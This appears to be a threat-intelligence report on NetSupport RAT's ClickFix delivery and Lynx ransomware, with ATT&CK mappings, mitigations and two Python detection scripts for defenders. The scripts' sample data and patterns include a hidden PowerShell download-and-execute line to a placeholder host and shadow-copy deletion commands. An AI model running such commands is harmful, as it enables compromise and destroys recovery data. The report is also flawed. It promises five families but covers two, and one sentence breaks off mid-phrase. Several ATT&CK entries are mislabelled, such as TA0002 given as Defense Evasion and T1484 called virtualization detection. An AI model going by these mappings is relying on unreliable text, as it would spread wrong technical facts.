Full Report
The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods. Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments.

NetSupport RAT Exploiting the ClickFix Technique

In early 2025, threat actors began exploiting a technique
Analysis Summary
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan exploited in early 2025 using the "ClickFix" technique. It allows attackers full remote control over compromised systems, enabling activities such as screen monitoring, file manipulation, and arbitrary command execution.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (Implied by reliance on PowerShell and standard Windows executables)
- Capabilities: Real-time screen control, file management (upload/download/delete), remote command execution, clipboard stealing, keystroke logging, process/service manipulation, persistence mechanisms.
- First Seen: Mentioned in active campaigns in Q1 2025.
## MITRE ATT&CK Mapping
- TA0002 - Execution
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell
- TA0003 - Persistence
  - T1547 - Boot or Logon Autostart Execution
    - T1547.001 - Registry Run Keys / Startup Folder
- TA0005 - Defense Evasion
  - T1027 - Obfuscated Files or Information
  - T1055 - Process Injection
- TA0007 - Credential Access
  - T1056 - Input Capture
    - T1056.001 - Keylogging
  - T1115 - Clipboard Data
- TA0011 - Command and Control
  - T1573 - Encrypted Channel
## Functionality
### Core Capabilities
- Real-time remote viewing and control of the victim's screen.
- Ability to remotely run system commands and PowerShell scripts.
- File system manipulation (uploading, downloading, modifying, and deleting files).
- Capturing copied text (clipboard data) and recording keystrokes.
### Advanced Features
- Utilizes process injection and code obfuscation for evasion.
- Establishes stealthy C2 connections using encrypted traffic.
- Implements persistence by installing itself in startup folders, registry keys, or scheduled tasks.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context]
- Registry Keys: Mentioned as a mechanism for persistence (modifies registry startup keys).
- Network Indicators: Connects to a Command-and-Control (C2) server using encrypted traffic.
- Behavioral Indicators: Execution of malicious PowerShell commands downloaded via fake CAPTCHA pages (ClickFix technique); execution of scripts via `wscript.exe`; creation of internet connection objects for remote control.
## Associated Threat Actors
- [Not explicitly named for NetSupport RAT, but distributed by "threat actors" exploiting the ClickFix technique.]
## Detection Methods
- Signature-based detection (Expected, but not detailed).
- Behavioral detection: Monitoring for PowerShell execution triggered by web interactions (ClickFix context); monitoring for suspicious system process injection.
- YARA rules: [Not provided in the context]
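The behavioral detection above (a script host launched from a user-facing process with a download cradle and window-hiding switches) can be expressed as a small scoring rule over process-creation telemetry. The following is an added example, not code from the report; the `ProcEvent` fields are assumptions modelled on Sysmon Event ID 1, and the sample events are constructed, including the `example.invalid` URL.

```python
"""Scoring rule for the ClickFix delivery chain over process-creation events.

Added example; events below are constructed, not telemetry from a real incident.
Field names (image, parent_image, command_line) are assumptions modelled on
Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


# Processes a user reaches from a browser-driven "verify you are human" prompt
# (Run dialog via explorer.exe, or the browser itself).
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "runonce.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download-cradle, remote-URL and window-hiding indicators in the command line.
CRADLE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|irm|invoke-restmethod"
                    r"|curl\s+http|msiexec\s+/i\s+http)", re.I)
REMOTE = re.compile(r"https?://", re.I)
HIDDEN = re.compile(r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s|-nop(rofile)?\b|bypass)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); a score of 3 or more is treated as a ClickFix alert."""
    reasons: list[str] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in USER_LAUNCHERS:
        reasons.append(f"script host {img} spawned by user launcher {parent}")
    if CRADLE.search(ev.command_line):
        reasons.append("download cradle in command line")
    if REMOTE.search(ev.command_line):
        reasons.append("remote URL in command line")
    if HIDDEN.search(ev.command_line):
        reasons.append("window hiding / policy bypass switches")
    return len(reasons), reasons


def detect(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return the events whose score reaches the alert threshold, with their reasons."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= 3:
            alerts.append((ev, reasons))
    return alerts


# Constructed sample telemetry: a benign scheduled script, a ClickFix-style
# PowerShell launch from explorer.exe, and a wscript.exe launch with no cradle.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r'powershell -w hidden -nop -c "iwr http://example.invalid/verify.txt | iex"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\explorer.exe",
              r"wscript.exe C:\Users\u\AppData\Local\Temp\client.js"),
]

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(basename(ev.image), "<-", basename(ev.parent_image), "|", "; ".join(reasons))
```

The threshold keeps a lone `wscript.exe` launch from `explorer.exe` (score 1) below the alert line, since that also happens on benign double-clicks; in production the same event would still be a candidate for a lower-severity hunt query, and the `bypass` and `-nop` terms should be tuned against the environment's own admin scripts.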
## Mitigation Strategies
- User training to recognize and avoid interacting with fake CAPTCHA pages or prompts requiring script execution.
- Application whitelisting for PowerShell.
- Strict control over registry auto-start locations.
- Monitoring for process injection activity.
## Related Tools/Techniques
- ClickFix Technique (Delivery mechanism).
- wscript.exe execution.
***
# Tool/Technique: Lynx Ransomware-as-a-Service (RaaS)
## Overview
Lynx Ransomware is a sophisticated Ransomware-as-a-Service (RaaS) operation that evolved from the earlier INC ransomware. It targets diverse industries, provides a user-friendly affiliate panel for deployment, and employs double extortion tactics (data theft followed by encryption), incentivizing affiliates with an 80% ransom share.
## Technical Details
- Type: Malware family (Ransomware, RaaS)
- Platform: Windows (Implied by standard ransomware behaviors like VSC deletion and targeting local/network drives).
- Capabilities: File encryption, data exfiltration (double extortion), VM/sandbox detection, in-memory execution, shadow copy deletion, credential dumping.
- First Seen: Intensified operations in Q1 2025 (January/February 2025 attacks cited).
## MITRE ATT&CK Mapping
- TA0002 - Execution
  - T1059 - Command and Scripting Interpreter (Implied for initial execution/setup)
- TA0009 - Collection
  - T1005 - Data from Local System
  - T1003 - OS Credential Dumping (Utilizes credential dumping techniques)
- TA0010 - Exfiltration
  - T1041 - Exfiltration Over C2 Channel (Transfers stolen data over encrypted channels like HTTPS)
- TA0002 - Defense Evasion
  - T1496 - Resource Hijacking (Implied by running in memory)
  - T1484 - Virtualization Detection
- TA0006 - Credential Access
  - T1555 - Credentials from Managed Applications (Targets browsers, Windows Credential Manager)
- TA0004 - Privilege Escalation (Implied by potential VSC manipulation)
## Functionality
### Core Capabilities
- Encrypts all files by default, including local, network, and removable media.
- Data exfiltration prior to encryption is mandatory; stolen data is published on a leak site if payment is not made.
- Disables recovery features by deleting Volume Shadow Copies (VSCs).
- Uses RestartManager to close applications that might block encryption.
### Advanced Features
- Configurable RaaS panel allows affiliates to customize victim profiles, ransomware samples, and data leak schedules.
- Employs DGA-based domains and Tor for anonymized C2 communication.
- Runs primarily in memory, avoiding writing files to disk to evade static analysis.
- Contains specific checks to detect and alter behavior when running inside Virtual Machines or sandboxes.
- Utilizes credential dumping techniques against stored credentials (browsers, Credential Manager).
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Custom generated samples per affiliate/victim.
- Registry Keys: [Not provided in the context]
- Network Indicators: C2 connections utilize DGA-based domains and anonymized traffic via Tor.
- Behavioral Indicators: Attempts to delete Volume Shadow Copies; launching system processes to close interfering applications; attempts to access browser or Credential Manager data; in-memory execution patterns.
## Associated Threat Actors
- Lynx Ransomware-as-a-Service (RaaS) operators.
- Affiliates utilizing the RaaS infrastructure.
## Detection Methods
- Signature-based detection (Expected for custom samples).
- Behavioral detection: Monitoring for file encryption patterns combined with shadow copy deletion; detection of connections to known DGA or Tor exit nodes associated with C2; monitoring attempts to access credential storage locations.
- YARA rules: [Not provided in the context]
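The first behavioral detection listed above, file encryption patterns combined with shadow copy deletion, is a correlation rather than a single-event match: a burst of renames to one new extension by a process, tied to a shadow-copy deletion command run by that process or one of its children. The following is an added example, not code from the report; the `Event` fields are assumptions modelled on Sysmon process-creation and file-event telemetry, the timeline and `.locked` extension are constructed, and the thresholds are illustrative.

```python
"""Correlate an encryption-like rename burst with shadow-copy deletion.

Added example; events are constructed and field names (ts, kind, pid, ppid,
detail) are assumptions modelled on Sysmon process-creation and file events.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Event:
    ts: float                   # seconds on a constructed timeline
    kind: str                   # "proc" (process creation) or "file" (rename/create)
    pid: int                    # process that performed the action
    detail: str                 # command line for "proc", target path for "file"
    ppid: Optional[int] = None  # parent pid, present on "proc" events


# Command lines that remove recovery points (vssadmin, wmic, wbadmin, bcdedit).
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|wbadmin(\.exe)?\s+delete\s+catalog|bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I)

BURST_WINDOW = 60.0    # seconds
BURST_THRESHOLD = 20   # files renamed to the same new extension within the window


def shadow_delete_events(events: list[Event]) -> list[Event]:
    """Process-creation events whose command line deletes shadow copies."""
    return [e for e in events if e.kind == "proc" and SHADOW_DELETE.search(e.detail)]


def rename_bursts(events: list[Event]) -> dict[int, str]:
    """Map pid -> dominant new extension for pids that produce an encryption-like burst."""
    by_pid: dict[int, list[Event]] = defaultdict(list)
    for e in events:
        if e.kind == "file":
            by_pid[e.pid].append(e)
    bursts: dict[int, str] = {}
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e.ts)
        exts = [e.detail.rsplit(".", 1)[-1].lower() if "." in e.detail else "" for e in evs]
        start = 0
        for end in range(len(evs)):            # sliding window over the sorted events
            while evs[end].ts - evs[start].ts > BURST_WINDOW:
                start += 1
            window = exts[start:end + 1]
            if len(window) >= BURST_THRESHOLD:
                top = max(set(window), key=window.count)
                if window.count(top) >= BURST_THRESHOLD:
                    bursts[pid] = top
                    break
    return bursts


def detect(events: list[Event]) -> list[tuple[int, str, str]]:
    """Alert (pid, extension, command) when a bursting pid, or its child, deletes shadow copies."""
    bursts = rename_bursts(events)
    alerts = []
    for sd in shadow_delete_events(events):
        for pid, ext in bursts.items():
            if sd.pid == pid or sd.ppid == pid:
                alerts.append((pid, ext, sd.detail))
    return alerts


def build_sample() -> list[Event]:
    """Constructed timeline: a sync client, an admin running vssadmin, and a ransomware pid."""
    evs = []
    for i in range(5):                                     # benign: a few renames by a sync client
        evs.append(Event(ts=100 + i, kind="file", pid=777, detail=fr"C:\Users\u\Sync\report{i}.docx"))
    evs.append(Event(ts=150, kind="proc", pid=888, ppid=600,   # admin cleanup, no burst behind it
                     detail="vssadmin.exe delete shadows /for=C: /oldest"))
    for i in range(25):                                    # ransomware: 25 renames in 25 seconds
        evs.append(Event(ts=200 + i, kind="file", pid=4242,
                         detail=fr"C:\Users\u\Documents\file{i}.docx.locked"))
    evs.append(Event(ts=230, kind="proc", pid=5001, ppid=4242,  # child of the bursting pid
                     detail="vssadmin.exe delete shadows /all /quiet"))
    return evs


if __name__ == "__main__":
    for pid, ext, cmd in detect(build_sample()):
        print(f"pid {pid}: rename burst to .{ext} plus shadow deletion: {cmd}")
```

The lone `vssadmin` run by pid 888 is deliberately not alerted here, because backup maintenance does issue that command; it remains worth logging on its own, but the report's point is that the combination with an encryption pattern is what separates Lynx-style activity from administration.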
## Mitigation Strategies
- Regular, offline, and tested backups (ensuring VSCs are not the sole recovery method).
- Network segmentation to limit the scope of lateral movement and prevent encryption of network shares.
- Advanced endpoint protection capable of detecting in-memory artifacts and DGA communication.
- Strong credential hygiene and Multi-Factor Authentication (MFA).
## Related Tools/Techniques
- INC Ransomware (Predecessor).
- Ransomware-as-a-Service (RaaS) operational model.
- Double Extortion (Data Theft + Encryption).